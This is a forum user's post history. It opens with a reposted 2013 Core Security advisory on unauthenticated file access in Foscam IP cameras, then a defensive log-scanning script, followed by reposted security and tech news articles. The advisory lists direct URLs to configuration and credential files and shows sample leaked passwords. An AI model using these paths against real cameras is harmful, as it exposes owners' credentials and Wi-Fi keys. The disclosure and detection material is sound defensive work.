Everything posted by Matt
-
Description: Core Security Technologies Advisory - Due to improper access restrictions, the FOSCAM FI8620 device allows a remote attacker the ability to browse and access arbitrary files from the directories '/tmpfs/' and '/log/' without requiring authentication. This could allow disclosure of access credentials and more.
Author: Core Security Technologies, Andres Blanco, Flavio de Cristofaro
Source: FOSCAM IP-Cameras Improper Access Restrictions - Packet Storm
Code:

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

FOSCAM IP-Cameras Improper Access Restrictions

1. *Advisory Information*

Title: FOSCAM IP-Cameras Improper Access Restrictions
Advisory ID: CORE-2013-0613
Advisory URL: http://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions
Date published: 2013-07-23
Date of last update: 2013-07-23
Vendors contacted: Foscam
Release mode: User release

2. *Vulnerability Information*

Class: Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2574

3. *Vulnerability Description*

Due to improper access restriction the FOSCAM FI8620 device [1] allows a remote attacker to browse and access arbitrary files from the following directories '/tmpfs/' and '/log/' without requiring authentication. This could allow a remote attacker to obtain valuable information such as access credentials, Wi-Fi configuration and other sensitive information in plain text.

The list of affected files includes, but is not limited to, the following:

. 'http://<target_ip>/tmpfs/config_backup.bin'
. 'http://<target_ip>/tmpfs/config_restore.bin'
. 'http://<target_ip>/tmpfs/ddns.conf'
. 'http://<target_ip>/tmpfs/syslog.txt'
. 'http://<target_ip>/log/syslog.txt'

4. *Vulnerable Packages*

. FOSCAM FI8620 PTZ Camera.
. Other Foscam devices based on the same firmware are probably affected too, but they were not checked.

5. *Non-Vulnerable Packages*

Vendor did not provide details. Contact Foscam for further information.

6. *Vendor Information, Solutions and Workarounds*

There was no official answer from Foscam after several attempts (see [Sec. 9]); contact vendor for further information. Some mitigation actions may be do not expose the camera to internet unless absolutely necessary and have at least one proxy filtering HTTP requests to the following resources:

. '/tmpfs/config_backup.bin'
. '/tmpfs/config_restore.bin'
. '/tmpfs/ddns.conf'
. '/tmpfs/syslog.txt'
. '/log/syslog.txt'

7. *Credits*

This vulnerability was discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

8. *Technical Description / Proof of Concept Code*

8.1. *Accessing Manufacturer DDNS configuration*

By requesting the following URL using your default web browser:

/-----
http://<target_ip>/tmpfs/ddns.conf
-----/

you will see something like this:

/-----
[LoginInfo]
HostName=ddns.myfoscam.org
HostIP=113.105.65.47
Port=8080
UserName=<target username>
Password=<target plain password>
[Domain]
Domain=<target username>.myfoscam.org;
-----/

8.2. *Access Credentials Stored in Backup Files*

When a configuration backup is required by an operator/administrator, the backup is generated in the local folder 'tmpfs' named as 'config_backup.bin'. The binary file is just a dump of the whole configuration packed as Gzip and can be accessed by accessing the following URL:

/-----
http://<target_ip>/tmpfs/config_backup.bin
-----/

The presence of this temporary file enables an unauthenticated attacker to download the configuration files which contain usernames, plaintext passwords (including admin passwords), Wifi configuration including plain PSK, among other interesting stuff as shown below:

/-----
username = "admin "
password = "admin "
authtype = "15 "
authgroup = " "
[user1]
username = "user "
password = "user "
authtype = "3 "
authgroup = " "
[user2]
username = "guest "
password = "guest "
authtype = "1 "
authgroup = " "
-----/

It is important to mention that, in order to access the configuration file previously mentioned, an operator and/or administrator should have executed the backup process in advance.

9. *Report Timeline*

. 2013-06-12: Core Security Technologies notifies the Foscam team of the vulnerability.
. 2013-06-12: Vendor acknowledges the receipt of the email and asks for technical details.
. 2013-06-13: A draft report with technical details and a PoC is sent to vendor. Publication date is set for Jul 3rd, 2013.
. 2013-06-17: Core asks if the vulnerabilities are confirmed.
. 2013-06-17: Foscam product team notifies that they have checked CORE's website [2], but there is no Foscam info.
. 2013-06-18: Core notifies that the advisory has not been published yet and re-sends technical details and proof of concept.
. 2013-06-26: CORE asks for a reply.
. 2013-07-03: First release date missed.
. 2013-07-03: Core asks for a reply.
. 2013-07-11: Core notifies that the issues were reported 1 month ago and there was no reply since [2013-06-18].
. 2013-07-23: Core releases the advisory CORE-2013-0613 tagged as user-release.

10. *References*

[1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176.
[2] CORE Security Advisories http://www.coresecurity.com/grid/advisories.

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
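The advisory's workaround (section 6) is to put a filtering proxy in front of the camera. The added example below is not part of the advisory or Core Security's material; it is a detection script written for this post that shows how a defender running such a proxy would review its access log for requests under the two unauthenticated directories named above ('/tmpfs/' and '/log/'), separate requests the proxy already denied from ones where the file body was actually served, and tally confirmed exposures per source address. It assumes the proxy writes standard combined-format access logs; the log lines, addresses and function names (`find_sensitive_requests`, `exposure_summary`) are constructed for the example.

```python
import posixpath
import re
from typing import Dict, Iterable, List

# Directories the advisory (CORE-2013-0613) reports as reachable without
# authentication on the FI8620. Any request under them deserves a look.
SENSITIVE_PREFIXES = ("/tmpfs/", "/log/")

# One combined-log-format line, as written by an assumed reverse proxy
# (nginx/Apache defaults) placed in front of the camera.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic): two successful pulls of
# the sensitive files, one ordinary page load, one request the proxy already
# denied (with odd casing and doubled slashes), and one malformed line.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jul/2013:10:00:01 +0000] "GET /tmpfs/ddns.conf HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jul/2013:10:00:03 +0000] "GET /tmpfs/config_backup.bin HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [23/Jul/2013:10:01:00 +0000] "GET /index.htm HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Jul/2013:10:02:00 +0000] "GET //LOG//syslog.txt HTTP/1.1" 403 0 "-" "curl/7.30"',
    'this is not an access log line',
]


def normalise_path(raw: str) -> str:
    """Drop the query string, lower-case, collapse repeated slashes and
    resolve '.'/'..' so trivial variants of one path compare equal."""
    path = raw.split("?", 1)[0].lower()
    while "//" in path:
        path = path.replace("//", "/")
    return posixpath.normpath(path)


def is_sensitive(raw_path: str) -> bool:
    """True when the request targets one of the unauthenticated directories."""
    return normalise_path(raw_path).startswith(SENSITIVE_PREFIXES)


def find_sensitive_requests(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one record per request under a sensitive directory."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the review
        if not is_sensitive(m.group("path")):
            continue
        status = int(m.group("status"))
        hits.append({
            "ip": m.group("ip"),
            "path": normalise_path(m.group("path")),
            "status": status,
            # A 2xx means the file body actually left the device: a
            # confirmed exposure. Anything else was refused or failed.
            "served": 200 <= status < 300,
        })
    return hits


def exposure_summary(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count confirmed exposures per source address, for triage."""
    summary: Dict[str, int] = {}
    for h in hits:
        if h["served"]:
            summary[str(h["ip"])] = summary.get(str(h["ip"]), 0) + 1
    return summary


if __name__ == "__main__":
    found = find_sensitive_requests(SAMPLE_LOG)
    for h in found:
        flag = "EXPOSED" if h["served"] else "blocked"
        print(f'{flag:8} {h["ip"]:15} {h["status"]} {h["path"]}')
    print("confirmed exposures per IP:", exposure_summary(found))
```

Run against a real proxy log, the `served` flag is the one that matters: a 403 on these paths shows the filter doing its job, while any 2xx means the DDNS credentials or the whole configuration backup were handed to an unauthenticated client and the affected passwords and Wi-Fi PSKs should be rotated.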
-
Android malware is becoming more sophisticated, with ransomware and attacks that harvest bank details on the increase, according to Bitdefender. A report from the security software firm highlighted that SMS-based malware – which send texts to premium-rate numbers – is still by far the most common form of Android malware, but more advanced viruses are also on the rise. The firm highlighted an attack that targets text messages related to banking, known as ZitMo. "ZitMo receives commands from a Command and Control server and can forward all incoming SMS messages to it. This is of particular interest to attackers as they can receive the banking mTAN (mobile Transaction Authentication Number) as soon as users initiate the transaction." Almost half of ZitMo reports currently come from China, but European countries such as Germany and Romania are also reporting outbreaks. Ransomware, already a common sight for unwitting PC users, is also on the rise. The malware demands payment in order for users to regain control of their devices and is distributed as antivirus software. Catalin Cosoi, Bitdefender's chief security strategist, said that ransomware is following the same pattern as it did when it first emerged on PCs. "The increased level of sophistication and its similarity with PC ransomware might suggest that Android malware coders are branching out," he said. "Emulating the behaviour of PC malware on Android is no novelty, as we saw in the past how adware gained traction and evolved on the mobile OS." Last week, an Android vulnerability that allowed malicious code to be hidden inside legitimate app installer packages was discovered by security firm Sophos, which labelled it as an "elementary mistake". Source: V3.co.uk
-
Seriously? Go and read my post, then immediately read yours, and see which of us is the one showing off.
-
M2G: You realise that many voted just for the sake of voting and that only some of them will actually study that book. A good initiative; I hope to stick with it until the end myself.
-
There’s a funny catch-22 when it comes to privacy best practices. The very techniques that experts recommend to protect your privacy from government and commercial tracking could be at odds with the antiquated, vague Computer Fraud and Abuse Act (CFAA). A number of researchers (including me) recently joined an amicus brief (filed by Stanford’s Center for Internet and Society in the “Weev” case), arguing how security and privacy researchers are put at risk by this law. However, I’d also like to make the case here that the CFAA is bad privacy policy for consumers, too. It’s not just something that affects hackers and academics. The crux of a CFAA violation hinges on whether or not an action allows a user to gain “access without authorization” or “exceed authorized access” to a computer. The scary part, therefore, is when these actions involve everyday behaviors like clearing cookies, changing browser reporting, using VPNs, and even protecting one’s mobile phone from being identified. The Conveniences and Perils of Cookies By the latest count, users encounter 351 different third-party trackers when visiting popular sites like the Huffington Post, according to a recent study. The companies responsible for much of this tracking have repeatedly refused to honor user preferences, and private tracking technology is increasingly sophisticated at circumventing blocking tools. Clearing cookies limits the profiles advertisers can compile, essentially rendering us as a new user to web services. In fact, the FTC recommends that users clear cookies to protect their private information, and the Treasury Department advises the same — though in that case it’s to make sure their website is loading correctly for users. However, many websites rely on cookies to enforce paywalls. These companies do this so their freemium business models can work transparently, without initially requiring the user to be aware (i.e., log in) until they hit the limit. 
The New York Times, for example, imposes a 10 articles-a-month limit for non-subscribers, allowing users to browse 10 articles for free but then requiring payment for subsequent use. But the method the New York Times and other publications use to identify users is unreliable and easy to circumvent, even inadvertently. Clearing one’s cookies periodically — or even using a browser’s private browsing mode — bypasses the flimsy paywalls and allows users to continue reading stories. Under an unsophisticated judge’s take, this act could be interpreted as exceeding “authorized access” (of 10 free articles a month) — and is therefore a potential, prosecutable violation of the CFAA. Beware Agent User Beyond cookies, browser fingerprinting is another technique used to uniquely identify users as they browse. The technique essentially works by fingerprinting the combination of which browser a person is using (“user agent”), his/her IP address, and a variety of configuration settings. It’s not unlike human fingerprinting. Changing one’s user agent by altering the browser name that one’s browser reports to the website therefore reduces the accuracy of the fingerprint, making the tracking technique less reliable. However, altering our user agents is potentially problematic because some businesses personalize content and prices based on them. For example, some websites offer a different class of service on Gogo Inflight Wi-Fi, or different hotel prices and packages for Mac customers (Safari) vs. PC customers (Internet Explorer) — remember when Orbitz got caught doing this? Yet changing the user agent — which prevents the above discrimination and tracking — could conceivably exceed the authorized access intended for an individual’s computer device, thus violating the CFAA. Another privacy best practice bites the dust. 
And VPNs Too Virtual Private Network (VPN) services, which allow users to mask their true IP addresses by routing traffic via endpoints — sometimes in other countries — are basically private tunnels for users to route their traffic. Many companies restrict employee access to internal systems while not physically in the office to VPN only. Using a VPN ensures the data people are sending and receiving is encrypted and safe from prying eyes — such as eavesdropping hackers at Wi-Fi cafes, enterprising ISPs performing deep packet inspection for marketing purposes, or even governments looking to surveil traffic. (Dissidents for example would need to mask their locations in order to circumvent government blocks or surveillance when accessing sensitive content or services.) However, VPN services also allow users to circumvent geographic restrictions that businesses put on their products. That’s why the third largest Internet provider in New Zealand just added a service that masks computer location, so their users could access international content that otherwise wouldn’t be available because some businesses only offer content in geographies they’re able to monetize. Video streaming services like Hulu and the BBC for example rely on users’ IP addresses to restrict access to video content. Using a VPN for privacy reasons could therefore result in inadvertently circumventing the (mediocre) methods video services use to restrict content access. It’s yet another way that protecting oneself could mean violating the law. When Mobile Tracks Your Every Move Nearly every device — not just computers but tablets and smartphones too — has a radio that allows it to communicate with the local wireless hotspot. To identify the device uniquely, this radio has a unique serial number known as its MAC address. 
Recently, a variety of services have sprouted up that surreptitiously monitor this unique serial number to track us as we move about our day — for example, to follow shoppers through malls to better profile their shopping behaviors. While some of these services provide an opt-out, consumers would have to first know about the service and then find the opt-out page: difficult for something that occurs without our knowledge. (And not surprisingly, when stores do tell consumers they’re tracking them, the information is not well received.) A potentially more effective way to thwart this form of tracking is to change the MAC address serial number on a regular basis using apps such as MacChanger. These apps act like clearing cookies on one’s browser, effectively severing links to past history (i.e., previous shopping activities). However, many public wireless hotspots — like those in airports or coffee shops — rely on the MAC serial number to limit access to certain users. Changing our MAC addresses to protect privacy could therefore land us in violation of the CFAA because it allows us to “exceed authorized access” to a network protected by a system that relies on the persistence of these identifiers to exclude us. It’s a system that won’t let us out. *** We now know how revealing – and huge the amount! — of information we generate is, as we browse the internet or use our phones or just go about our daily lives. The recent revelations about the extent of government surveillance have also made clear that privacy best practices are no longer an academic or tech-savvy fringe enterprise. While cases like Weev’s draw attention to the limitations of the CFAA and our amicus brief argues it could curb necessary research, it’s also important to recognize that the laws that aim to protect us actually limit the valid tools consumers need to protect themselves online. As it is, consumers have only limited recourse in minimizing their digital footprints. 
Yet the CFAA's vague language of "authorized access" creates an environment where using technical tools to keep our behavior and content private could violate the law if we access the wrong site. Most users probably don't have any malicious intent when using any of the above technical tools, and the methods to restrict access to those sites are often very vulnerable to basic workarounds. It seems rather ironic to hold users accountable for the fact that the techniques used to limit or exclude their access are not very sophisticated – and are, arguably, dumb. Source: Wired.Com
-
Privacy ninjas want anti-NSA encrypted Android backups Privacy experts have urged Google to allow Android users' to encrypt their backups in the wake of the NSA PRISM surveillance flap. The useful "back up my data" option in Google's Android operating system sends a lot of private information from fandroids' devices to Google's cloud storage service. Such sensitive data includes wireless network passwords, application files and configuration settings. These backed-up bytes are probably stored in an encrypted form on the advertising giant's servers. However, if it is encrypted, then it's Google that has the decryption keys, not the person or organisation that owns the data. As such, the information is vulnerable to secret demands from government agents and cops for that data. If users had the cryptographic keys then at least they are aware of the surveillance and have a chance of personally fighting the request. Micah Lee - a staff technologist at privacy warrior outfit the Electronic Frontier Foundation and the maintainer of HTTPS Everywhere - argues that encrypted backups should be available. He outlined his wishes in a recent post to the Android Open Source Project. "The 'back up my data' option in Android is very convenient. However it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data," Lee writes. Backup data is already encrypted in transit (just like secure web traffic) so it cannot be intercepted by any old miscreant - but users don't have control over the encryption keys to their private data when at rest in Google's machines, a situation Lee would like to see changed. "You could implement this the same way Chrome's sync feature is implemented, with two options: encrypt synced passwords with your Google credentials and encrypt all synced data with your own sync passphrase," Lee argues. 
"Since backup and restore is such a useful feature, and since it's turned on by default, it's likely that the vast majority of Android users are syncing this data with their Google accounts. Because Android is so popular, it's likely that Google has plaintext wifi passwords for the majority of password-protected wifi networks in the world," he adds. Other security experts echo Lee's concerns. "[The data is] not encrypted in the sense of being inaccessible to anyone except you," explains security industry veteran Paul Ducklin in a post on Sophos's Naked Security blog. "That's obvious because, as a comment on Micah's posting pointed out, you can recover your data from Google even after you've wiped (or lost) your device, or changed your Google account password." "In other words, Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently even if you forget your device password and have to start over," he added. The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents. "The solution is to encrypt everything 'for your eyes only' before you back it up anywhere, especially into the cloud," Ducklin concludes. In a statement, Google said the backup feature is optional and built to be secure. Although a debate on the feature continues on the Android developer forum, Google didn't seem convinced about the need for any changes : Lee concedes that by using an operating system developed by Google that users are extending a fair degree of trust to the Chocolate Factory. 
His point is not that that trust shouldn't extend to Wi-Fi passwords: at the very least, users should be given a choice. "While using Android requires a certain amount of trusting Google, I don't think it's rational to expect users to trust Google with their plaintext passwords when Google can be compelled to give this data to the US government when they request it," Lee concludes. Source: TheRegister.co.uk
-
A software glitch in the New York bicycle-sharing program has led to a breach of customers' names, contact information, credit card numbers and security codes, passwords, and birth dates. Just before launching, the New York bicycle-sharing program Citi Bike accidentally leaked the private account information of 1,174 of its customers, according to the Wall Street Journal. The data was exposed via a software glitch and included customers' names, contact information, credit card numbers and security codes, passwords, and birth dates. While the data leak apparently took place on April 15, a few weeks before the program launched in the city, the company didn't notify the affected customers until July 19. According to the Wall Street Journal, Citi Bike discovered the breach at the end of May and corrected it immediately. "Notifications such as these are standard legal disclosures in any case where there is even the potential for information to have been improperly accessed. This potential security issue affected 1,174 of NYC Bike Share's approximately 180,000 customers," New York City Department of Transportation spokesman Seth Solomonow told CNET. "While there is no evidence that any personal information was maliciously accessed or misused, NYC Bike Share engaged a security firm to investigate and recommend appropriate steps to make notifications and safeguard its customers, including to provide identity and credit monitoring free of charge." Citi Bike is a city-run bike-sharing program in New York that lets users pick up and drop off bicycles at docking stations throughout the city with a $95 annual membership. The bikes are available 24 hours a day and 365 days a year. When the program launched in late May, more than 16,000 people had already signed up for the bike share. Now, Citi Bike has about 61,000 members and has served 180,000 customers, which includes people buying annual, weekly, and daily passes.
Security firm Identity Theft 911 told CNET that affected customers should take certain steps to safeguard their private information. Identity Theft 911 chairman Adam Levin said that users should change their passwords for other Web sites if they used the same password, watch out for e-mail and text scams, and place a fraud alert on their credit file. Source: News.Cnet.com
-
Almost 30% of all net addresses in Belarus are blocked by anti-spam firms because of the amount of junk mail passing through them, says a report. East European nations top the list of countries with the largest percentage of blacklisted net addresses, said security firm Cloudmark. It said Belarus had become popular among spammers as other nations cracked down on junk-mail senders. The US was still the single biggest source of spam, it said. Belarus (27.4%), Romania (22.3%) and Russia (3%) filled the top three slots of a list of nations that have IP addresses known to be sources of spam, said Cloudmark researcher Andrew Conway. Now, he said, data traffic from just over three million Belarusian IP addresses was being blocked in an attempt to stem the flood of junk mail passing through them. Paul Ducklin, security researcher at Sophos, said Belarus's ratio of junk-sending IP addresses to population meant it was "way out at the top" of its list of spam senders per capita. "It's been the worst per person all year," said Mr Ducklin, adding that despite its small size it was closing in on the US as the single biggest source of spam in the world. "Belarus is in a league of its own at the moment," he said. Mr Conway from Cloudmark said Belarus's rapid rise was the consequence of other Eastern European nations, such as Russia, getting better at stamping out spam sources. In addition many hosting firms and ISPs in other countries were reacting much more quickly, he said, which left spammers looking for places where they could act with impunity. Belarussian ISPs and hosting companies had also become a favourite among Romanian spam gangs, he said, who were being flushed out of other networks. The percentages were a historic high, said Mr Conway, and indicative of serious trouble. "Typically when we look at individual hosting companies if we are blocking more than 1% of the total they have a problem," he said.
Lax security controls by Belarussian net firms meant it was taking the blame for cyber criminals more than likely based outside the country, said Mr Conway. Most spam is now routed through hijacked machines and is rarely generated in the nations from which it seems to emanate. The large scale blacklisting would have a knock-on effect on legitimate businesses, he warned. "It'll cause problems for people who are there that want to send email internationally," said Mr Conway. Source: BBC.co.uk
-
Cybercrime and espionage add up to between $300 billion and $1 trillion in annual global losses, a study reveals. Security firm McAfee funded the study, carried out by the Center for Strategic and International Studies (CSIS), which quantified the economic impact of cybercrime after years of guesswork on the subject. CSIS enlisted the help of economists, intellectual property experts and security researchers to build an economic model and a methodology, which revealed that global losses are lower than previously estimated. Thus, the report showed that the upper bound of the losses is $1 trillion. The report also put the costs in the context of global GDP, noting that they represent only between 0.4% and 1.4%, compared with losses of $600 billion due to drug trafficking, which represent 5% of global GDP. The study's authors noted that it is difficult to rely on methods such as surveys, because companies that disclose their cyber losses often cannot properly estimate and quantify those amounts. For the purposes of the research, CSIS classified malicious activity into six areas:
- loss of intellectual property;
- cybercrime;
- opportunity costs, including service disruptions and reduced trust in online activities;
- additional costs for securing networks, insurance and recovery after cyber attacks;
- reputational damage to the attacked company;
- measuring the losses associated with cyber attacks.
"We believe the CSIS report is the first to use actual economic modelling to build figures for the losses due to malicious cyber activity," said Mike Fey, executive vice president and chief technology officer at McAfee.
As the new study acknowledges, the costs of malicious cyber activity involve more than the loss of financial assets or intellectual property, and also take into account damage to brand and reputation, consumer losses due to fraud, opportunity costs from service disruptions, "clean-up" after cyber attacks and increased spending on cyber security. "This report is also the first to link malicious cyber activity to job losses," said James Lewis, co-author of the CSIS report. The authors estimate that 508,000 US jobs are potentially lost each year because of cyber espionage. While this first CSIS report builds a model to quantify the direct losses from cybercrime and cyber espionage, a second report analyses the security losses in terms of the pace of innovation, trade flows and the costs associated with crime and job losses. The report's authors said the heart of the problem lies in the effect of the costs of cybercrime and cyber espionage on trade, technology and competitiveness. "Answering these questions will help us put the problem in its strategic context," the study's authors explained. Source: Computerworld - IT news, features, blogs, tech reviews, career advice
-
'Higher level of paranoia' suggests EU and US users should change passwords French-based server host OVH has warned that its systems have been penetrated in a multi-stage attack that leaves US and European customers at risk. In an advisory on its forum board, the company warned that an attacker had gained control of a system administrator's account, and used that to gain access to a VPN account of one of the firm's backoffice staff. This was used to get the personal data of customers in Europe and from a hosting firm in Canada. "Overall, in the coming months the back office will be under PCI-DSS which will allow us to ensure that the incident related to a specific hack on specific individuals will have no impact on our databases," the company said. "In short, we were not paranoid enough so now we're switching to a higher level of paranoia. The aim is to guarantee and protect your data in the case of industrial espionage that would target people working at OVH." European customers' surname, first name, nic, address, city, country, telephone, fax, and encrypted password are all open to the attackers, and customers of the firm's Canadian hosting company have been advised to change SSH keys to ensure a secure connection. The company is staying mum about what exact data has been scraped, but has filed a complaint about the issue to local judicial authorities. This isn't the first time OVH has suffered an attack. Back in May the company warned that its backoffice functions had been breached by hackers unknown and passwords were stolen. Source: TheRegister.co.uk
-
Possible data loss as SSDs fail during terabyte transfer, service goes down The Darwinian derby to determine which RSS-reading service would replace Google Reader as the world's dominant feed-wrangler may just have produced its first extinction event, after theoldreader.com choked on its recently-enlarged database and crashed. The Old Reader's schtick is that it looks and behaves pretty much exactly like Google Reader, which made it a nice alternative for refugees. As the graphs below (taken from the service's blog) show, user numbers have surged from around 10,000 in March to over 375,000 today. http://regmedia.co.uk/2013/07/24/the_old_reader_growth.png That July 5th post also says the outfit uses "... this amazingly cheap but somewhat unreliable hosting provider" that has led to "some issues with our database servers" and outages. Old Reader seems to have decided to do something about that, but the something has failed. As the company now says, in an "Important Update", a weekend attempt to migrate to new servers has failed. "On Saturday (July 20) we moved over a terabyte of data from one storage system to another," the blog reports. Things went fine until "we started seeing a higher I/O load after we finished, and suddenly one SSD drive in one of our database servers stopped working." A second SSD in another disk then failed, and then another pair also fell over. One of those was in a server that was in the process of restoring data. At some point it all got too much and the service ground to a halt. The Old Reader's site is now displaying apologies, cat photos and a promise that a fix "will probably take a day or two". Source: TheRegister.co.uk
-
Oz PhD student demos 1.8 Tbps, 800 Km link
A group of researchers led by a Monash University PhD student has demonstrated an all-optical technique for dealing with nonlinearity – something that considerably boosts the throughput of an optical system. The demonstration is important for two reasons. One is that fibre optic cables used to transport signals over long distances need occasional boosters. As you'll read below, this demonstration renders those unnecessary, a boon for network operators. The second is speed. At 1.8 Tbps on a single fibre path, this technology has the potential to upgrade even modest extant fibre systems (that typically have many such paths) to hundreds of terabits per second.

The technique that makes this all possible is mid-span spectral inversion (MSSI), and has been known since the 1990s. By inverting the spectrum of the optical signal – that is, changing the long wavelengths to short and vice-versa – MSSI adds a “pre-emphasis”, shaping the signal in such a way that non-linearities in the second half of the fibre “reverse” the effect of non-linearities in the first half. In other words, by reversing the time order of the wave-front, the fibre's nonlinearity – which distorts what started out as a nice optical pulse – helps reconstruct the original pulse. The downside is that this usually requires active electronics to be inserted into the path, which may not always be convenient.

In his paper, Monash PhD student Monir Morshed, working with collaborators from CUDOS in Sydney and Melbourne, describes an all-optical MSSI implementation, eliminating the active electronics. Instead, an all-photonic optical phase conjugation unit (the bit that performs the inversion) was inserted at the midpoint of the total 800 km link. The paper, which was deemed important enough to be accepted as a post-deadline presentation at the recent Kyoto OptoElectronics and Communications Conference (OECC), states: “Using 1.21 Tbit/s through 10×80-km fibers with EDFA amplification we show that MSSI improves the nonlinear threshold by 2.8 dB”. For an 800 km link on a single fibre, Monash University claims the technique offers more than ten times the capacity of current systems. Because it's an all-optical approach, the key component – the optical phase conjugator – could be retrofitted to any suitable fibre.
Source: TheRegister.co.uk
-
Asian telcos came out top in a new global study of the prepaid mobile market by KPMG designed to find the best customer experience in-store and over-the-phone, with the UK, US and Australia all placing disappointingly outside the top ten. The In Search of a Better Customer Experience study (PDF) rated 106 mobile providers across 25 countries. KPMG used mystery shoppers to carry out over 850 store visits and 750 calls to contact centres, with providers assessed according to a variety of criteria including average wait times, ease-of-understanding, agent/sales consultant soft skills and use of voice recognition technology. Overall in-store scores by country put China (82 per cent) in top spot followed by Indonesia (79 per cent) and Singapore (76 per cent). Somewhat disappointingly the US came down in 11th place with a score of 68.5 per cent and the UK just behind with 68.3 per cent, while Australia came in 18th with 65.7 per cent, beaten by countries including Vietnam, India and Mexico. Common problems seen by KPMG which may have contributed to the poor scores included unavailability of SIMs and long wait times.

The report had the following: Tellingly, fewer than 40 per cent of US and UK mobile stores had a concierge, with the number dropping to around 20 per cent for Australia. In China and Singapore the figure was 100 per cent. When it came to contact centres, China again came top (87.5 per cent), this time followed by Portugal (86.4 per cent) and Poland (83.6 per cent). New Zealand crept into 8th with 75.7 per cent but the rest of the top ten was mainly filled with more Asian countries. Again, more “mature” markets in the West performed badly, with the UK in 12th (74 per cent), US in 18th (71 per cent) and Australia in 19th (69.9 per cent). A common criticism of failing telcos was complex and non-intuitive Interactive Voice Response (IVR) systems.

The report added the following, which will ring bells with UK mobile customers: Long wait times before being put through to an agent post IVR selection were also highlighted, and it’s no surprise here that the UK and US performed fairly poorly at around the 1 minute mark, with China down nearer 10 seconds. It should be noted that Asian countries have a relatively high penetration of prepaid mobile users compared to, say, the UK and therefore their telcos should be expected to deal better with this type of customer. However, the report still serves to highlight persistent deficiencies with customer service in markets like the UK, US and Oz where telcos have been doing this for a lot longer.
Source: TheRegister.co.uk
-
China produces the most internet attack traffic in the world, although its lead at the top of the charts has been threatened by Indonesia. Data from network firm Akamai in its quarterly State of the Internet report found that in the first quarter of 2013 a total of 34 percent of attacks originated in China. However, this was down from 41 percent in the previous quarter at the end of 2012. This drop was due in part to a huge rise in traffic from Indonesia, which rose from just 0.7 percent to 21 percent in the quarter. Akamai said this was most likely due to a rise in botnet activity in the nation. The US was third, at 8.3 percent, with Turkey fourth on 4.5 percent and Russia fifth at 2.7 percent. All of these numbers represented a decline, which is also most likely due to the huge increase in attacks being sent from Indonesia. The numbers do not necessarily mean the attacks are being carried out by persons in the nations, as cyber criminals in another nation could be redirecting attacks via compromised systems to make them appear as if they are coming from that country, Akamai noted.

Distributed denial of service (DDoS) attacks also rose in the first quarter of 2013, with 208 reported to Akamai, up from 200 in the same quarter in 2012. The majority of the attacks, 72, targeted enterprises, with the financial services market receiving 36 attacks. Energy firms faced five attacks, as did the automotive industry. Akamai said the threat to enterprise was likely to grow over time, based on the data the firm was seeing. “The number of DDoS attacks Akamai encounters shows every indication of continuing to grow, with nearly 5 percent more attacks being reported in the first quarter of 2013 as compared to the fourth quarter of 2012,” the report said. “It remains difficult to determine the nature of the attackers because botnets are necessary to create the attacks, and the command and control (C&C) infrastructures of these botnets are designed to protect their owners.”

In other areas of the report, the firm reported a rise in the average internet speed around the world by four percent to 3.1Mbps. South Korea retained its top position, with an average speed of 14.2Mbps, while the UK hit 7.9Mbps, up from 6.5Mbps last year. Other good news for the UK is that over 20 percent of the nation can now access speeds of above 10Mbps, up from 11 percent in the last quarter. Akamai’s data is based on almost 700 million unique IP addresses connected to its monitoring platform, which can monitor connection speeds and security incidents.
Source: V3.co.uk
-
